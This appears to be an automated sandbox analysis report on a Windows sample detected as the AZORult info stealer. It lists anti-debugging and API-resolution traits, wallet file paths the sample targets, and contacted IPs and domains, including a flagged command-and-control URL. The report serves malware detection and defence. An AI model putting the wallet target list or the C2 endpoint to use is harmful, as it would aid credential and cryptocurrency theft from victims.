Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00460AFD mov eax, dword ptr fs:[00000030h] 0_2_00460AFD
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004606F5 mov eax, dword ptr fs:[00000030h] 0_2_004606F5
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004606F5 mov ecx, dword ptr fs:[00000030h] 0_2_004606F5
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004A0000 mov eax, dword ptr fs:[00000030h] 0_2_004A0000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004A0000 mov ecx, dword ptr fs:[00000030h] 0_2_004A0000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004A0408 mov eax, dword ptr fs:[00000030h] 0_2_004A0408
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_00417216

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: GetLocaleInfoA, 0_2_00404BA8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00404C71 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId, 0_2_00404C71
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004065F0 GetUserNameW, 0_2_004065F0

Stealing of Sensitive Information:

barindex
Yara detected Azorult
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Detected AZORult Info Stealer
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004186C4 0_2_004186C4
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004186C4 0_2_004186C4
Yara detected Azorult Info Stealer
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: electrum.dat
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %appdata%\Electrum\wallets\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Exodus\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Exodus\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: %appdata%\Electrum-LTC\wallets\
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
5.79.68.108
 survey-smiles.com Netherlands
60781 LEASEWEB-NL-AMS-01NetherlandsNL false
199.59.242.153
 12065.BODIS.com United States
395082 BODIS-NJUS false
63.141.242.43
 admin.svapofit.com United States
33387 NOCIXUS true

Contacted Domains

Name IP Active
admin.svapofit.com 63.141.242.43 true
survey-smiles.com 5.79.68.108 true
12065.BODIS.com 199.59.242.153 true
ww1.survey-smiles.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://survey-smiles.com/ false
  • Avira URL Cloud: safe
 unknown
http://admin.svapofit.com/azs/index.php true
  • Avira URL Cloud: safe
 unknown
http://ww1.survey-smiles.com/ true
  • Avira URL Cloud: phishing
 unknown